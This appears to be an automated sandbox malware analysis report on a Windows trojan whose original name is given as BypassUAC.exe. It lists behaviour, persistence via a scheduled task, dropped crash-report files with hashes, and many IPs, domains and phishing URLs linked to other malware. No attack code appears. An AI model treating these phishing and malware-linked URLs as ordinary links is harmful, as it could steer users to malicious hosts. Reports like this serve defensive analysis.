                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:r8k29DBraE.exe
                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                Original Sample Name:03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.expl.evad.winEXE@16/81@3/4
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 94.4%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                                • Number of executed functions: 105
                                                                                                                                                                                • Number of non-executed functions: 307
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.136, 40.126.32.74, 40.126.32.76, 20.190.160.17, 40.126.32.133, 40.126.32.138, 40.126.32.72, 178.79.208.1, 20.190.160.22, 40.126.32.68, 20.190.160.20, 104.208.16.94
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                                • Execution Graph export aborted for target wzcsapi.exe, PID 6880 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                • VT rate limit hit for: r8k29DBraE.exe

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                05:20:27API Interceptor55570x Sleep call for process: wzcsapi.exe modified
                                                                                                                                                                                05:20:27API Interceptor4362x Sleep call for process: svchost.exe modified
                                                                                                                                                                                07:03:12API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                07:03:22API Interceptor418105x Sleep call for process: winlogon.exe modified
                                                                                                                                                                                07:03:23API Interceptor335270x Sleep call for process: lsass.exe modified
                                                                                                                                                                                07:03:25API Interceptor1728x Sleep call for process: wzcsvc.exe modified
                                                                                                                                                                                07:03:28API Interceptor393510x Sleep call for process: dwm.exe modified
                                                                                                                                                                                11:20:25Task SchedulerRun new task: wzcsapi path: %Current%\wzcsapi.exe

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                104.26.2.16zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • arc-gym.com.cutestat.com/wordpress/wp-login.php
                                                                                                                                                                                162.19.58.157http://nmacouai-80bf.edohlriapdnoap.workers.devGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  http://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      https://polap77.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        https://auebg-8a9e.bosrmeadeklc.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            https://kuconlogin-ui.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              https://claim.eventsmidasbuys.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                https://uphlld_logusn.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  DEMANDA G.COM.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                    147.185.221.18Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        1c8DbXc5r0.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                          6Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                                                                                                                                                                                                            b34J4bxnmN.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                              01koiHnedL.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                i231IEP3oh.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                  killer.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    system47.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      javaupdate.jarGet hashmaliciousDynamic StealerBrowse
                                                                                                                                                                                                                        169.197.85.95https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              https://en-io-trezor-docs.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                https://upholzds_logiaz.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://steamcommunilty.com/dota/promoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://trezor-docs-info.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                      https://krokerkenlogicttin.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://kukcon-xlogns.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://uphlld_logusn.godaddysites.com/Get hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            windowsupdatebg.s.llnwi.netRequest for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                            • 87.248.204.0
                                                                                                                                                                                                                                            Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 178.79.238.128
                                                                                                                                                                                                                                            https://jobs.sap.com/job/Walldorf-SAP-Ariba-Technology-Consultant-EMEA-ISBN-Technology-Services-%28Location-Germany%29-69190/1110452901/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 87.248.204.0
                                                                                                                                                                                                                                            SecuriteInfo.com.W32.PossibleThreat.20383.9039.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 46.228.146.0
                                                                                                                                                                                                                                            file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                            • 87.248.205.0
                                                                                                                                                                                                                                            https://saaxzz2569.cyou/m/user/indexGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 87.248.204.0
                                                                                                                                                                                                                                            https://qrco.de/bfTkZ4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 178.79.208.1
                                                                                                                                                                                                                                            https://bt-custom3r-serv1ce.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 87.248.204.0
                                                                                                                                                                                                                                            https://798-ads.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 178.79.208.1
                                                                                                                                                                                                                                            https://urless.com/XMVIgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 178.79.238.128
                                                                                                                                                                                                                                            i.ibb.cohttps://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.161
                                                                                                                                                                                                                                            http://nmacouai-80bf.edohlriapdnoap.workers.devGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 162.19.58.156
                                                                                                                                                                                                                                            http://netflix-n-chill.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            https://rondoc-b7ce.lvauayt.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.160
                                                                                                                                                                                                                                            https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.194.8.184
                                                                                                                                                                                                                                            http://sanjaygowda23.github.io/netflix-homepageGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.194.8.184
                                                                                                                                                                                                                                            http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            https://soulis-alex.github.io/netflix/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.19.58.156
                                                                                                                                                                                                                                            rentry.coQ1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.75.40
                                                                                                                                                                                                                                            hzUKkzHBqd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            MVgsmZoDvQ.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                                            • 172.67.75.40
                                                                                                                                                                                                                                            hQI2tssFc0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            cs.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                                            • 172.67.75.40
                                                                                                                                                                                                                                            R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                                            • 104.26.3.16
                                                                                                                                                                                                                                            FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                                            • 104.26.3.16
                                                                                                                                                                                                                                            egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                            • 104.26.3.16
                                                                                                                                                                                                                                            x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 172.67.75.40

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            PUREVOLTAGE-INCUShttps://ducati-mlbb.shop/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 162.249.168.129
                                                                                                                                                                                                                                            https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.244.159.148
                                                                                                                                                                                                                                            https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.244.159.148
                                                                                                                                                                                                                                            https://email.mail.dlce.cc/c/eJxMkLGu2zAMAL_G2mRQNC1Kg4Yu-Y2AIqVGqGMbiVEgf18E6PDWwy13cp73YSVRDhYW8CxonpTJZ4rdQ9UYrUIyTM5KFJUUXSuBMVHOKaF7FCSt2iWzJIldM2sUaYtGUuMY1I2CgBQAckhrQJwXaMl6YrPQE1OYCJ4yttk2bbOq28rjus73tPya8Dbh7T-f8NarqGnFgFVrXXABZlsl59aBFNjtxzX6ULnGsX_LslFvHbJfexZPvaGXwOwRgXo1Ya7szk0-7fXVrcUaU1g8AKknhOqTZvWAUcHSWiOxe5Wx92MiqPI55fWnj_dj7L9nPZ7u3Xa7X-P541Fwfwv-CwAA__-Ag2laGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.244.159.148
                                                                                                                                                                                                                                            https://meaoee-fc3f.elamzioehr.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.249.168.129
                                                                                                                                                                                                                                            https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                                                            • 162.249.168.129
                                                                                                                                                                                                                                            https://en-io-trezor-docs.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            CLOUDFLARENETUSQ1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.159.135.232
                                                                                                                                                                                                                                            hzUKkzHBqd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            MVgsmZoDvQ.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                                            • 172.67.75.40
                                                                                                                                                                                                                                            hQI2tssFc0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.16.184.241
                                                                                                                                                                                                                                            lfyJfb6jSS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                            http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                                                                                            http://translate.howGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                                            http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.19951.1573.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.141.93
                                                                                                                                                                                                                                            SALSGIVERUSSpeedHack666Cheat (no VM detected).exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            mIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.21
                                                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            W1FREE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.22
                                                                                                                                                                                                                                            Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.18
                                                                                                                                                                                                                                            7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.18
                                                                                                                                                                                                                                            CENTURYLINK-US-LEGACY-QWESTUSna.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 174.124.122.209
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 216.9.192.166
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 75.171.124.182
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 69.68.76.227
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 65.149.196.1
                                                                                                                                                                                                                                            4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 75.168.189.227
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 67.237.29.87
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 138.15.49.36
                                                                                                                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 63.231.92.27
                                                                                                                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 63.231.92.27

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eQ1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            hzUKkzHBqd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            hQI2tssFc0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            xc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            qz.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            _FA_2024-09-01_17031.PDF.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            captcha.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95
                                                                                                                                                                                                                                            0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                                                                                                                                            • 162.19.58.157
                                                                                                                                                                                                                                            • 104.26.2.16
                                                                                                                                                                                                                                            • 169.197.85.95

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            C:\Users\user\Desktop\wzcsvc.exewzcstatus.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_r8k29DBraE.exe_eb64787a7acdaae91d5fed8f9e38caa8b37842_792eb0e9_ac445ba2-72a9-43bf-b1a3-43181b6be2cb\Report.wer

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.2591948169420386
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:p3hzcdz5n0XCDVaWJ3OCHUeZFTanlnazuiFvZ24lO8Ou:phzkzaXCDVa29RcazuiFvY4lO8n
                                                                                                                                                                                                                                              MD5:4E854B8EA6AD33A23ACB27E1797F7C20
                                                                                                                                                                                                                                              SHA1:66BAD66313A5B0B49B34A2554172C94354EAD8B2
                                                                                                                                                                                                                                              SHA-256:F746D957DB4D69CED08FBB4860C19E857D1136F19B8DA4D3C212F53C645C6F64
                                                                                                                                                                                                                                              SHA-512:17B1DD382C31A70A862141B3203E56CBCE813322C90D33FA59AD0D6F8FF3001F20EA824F4AEDDCD8B5FD3E6FE8AD03823213CB470C549530B860B627F7957914
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.4.5.7.6.2.1.8.3.0.4.0.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.4.5.7.6.2.2.4.5.5.3.9.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.4.4.5.b.a.2.-.7.2.a.9.-.4.3.b.f.-.b.1.a.3.-.4.3.1.8.1.b.6.b.e.2.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.8.6.3.8.a.4.-.5.e.f.2.-.4.0.5.7.-.b.6.7.a.-.e.b.1.6.0.e.1.e.3.8.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.8.k.2.9.D.B.r.a.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.y.p.a.s.s.U.A.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.0.-.0.0.0.1.-.0.0.1.4.-.b.f.1.d.-.6.2.7.3.e.3.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.d.e.7.6.1.4.2.9.7.a.4.6.2.0.3.2.a.2.c.a.9.a.2.8.4.5.a.2.3.a.9.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.f.4.4.2.9.9.3.9.e.5.7.6.6.6.b.8.a.5.7.c.2.d.7.b.9.5.a.4.8.0.1.f.a.7.c.a.2.0.!.r.8.k.2.9.D.B.r.a.E.

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE551.tmp.dmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 16 streams, Tue Oct 15 09:20:22 2024, 0x1205a4 type
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):452219
                                                                                                                                                                                                                                              Entropy (8bit):3.513357610370291
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:jAf9GkLLILyRIFQC1CCqjTyBmr6vUPk5yzUb6c23+vMz2XPy4D+oUbJf8dqcSamB:c1GkLcI6qj623QMz2XK/oOJ0dia9u
                                                                                                                                                                                                                                              MD5:BCA302679F17F5FAC2E66278A242980F
                                                                                                                                                                                                                                              SHA1:6F6AB592E2356DA2BAD1A5263C7C46E6BF0C2EAC
                                                                                                                                                                                                                                              SHA-256:45C2212DDE398F8CB269475B91A1522082467831684D7BA961C253CC6D492C24
                                                                                                                                                                                                                                              SHA-512:0DDCBE0AB83CABE3E476F0E8DB826920821751D85D85637FCB141FE34869D3B916255571612FEDD0A06EEEC0BE74651C244D961FAD056336ADF51694D6F6311A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:MDMP..a..... ........3.g............................4.......$....(..........((......D...(x..........l.......8...........T............8..............D2..........04..............................................................................eJ.......4......Lw......................T............3.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6E8.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8606
                                                                                                                                                                                                                                              Entropy (8bit):3.6977634071093393
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJG1ZC/A6YNZd/fWgmfZZdprr89bIszdf0s4m:R6lXJcZCY6Yz9fWgmfHsIIdfv
                                                                                                                                                                                                                                              MD5:C17862692858CBF66CEB5C5C4B6FA0B5
                                                                                                                                                                                                                                              SHA1:AD5AE46825BE2B786069C2D78861A4E448899E02
                                                                                                                                                                                                                                              SHA-256:98180CA43F3F5BB700BC5565840435E18A139BE698A8328946B17AEC596F8F10
                                                                                                                                                                                                                                              SHA-512:AC5CB5E2EC1BA39EE72AB3D847DC713295AB90F16B3A8997CC310CBBA3F8F200E04DA1913CD6D7081C45C627FE7D8B9113F63C91CB3D36FF664B6BC68F802369
                                                                                                                                                                                                                                              Malicious:false
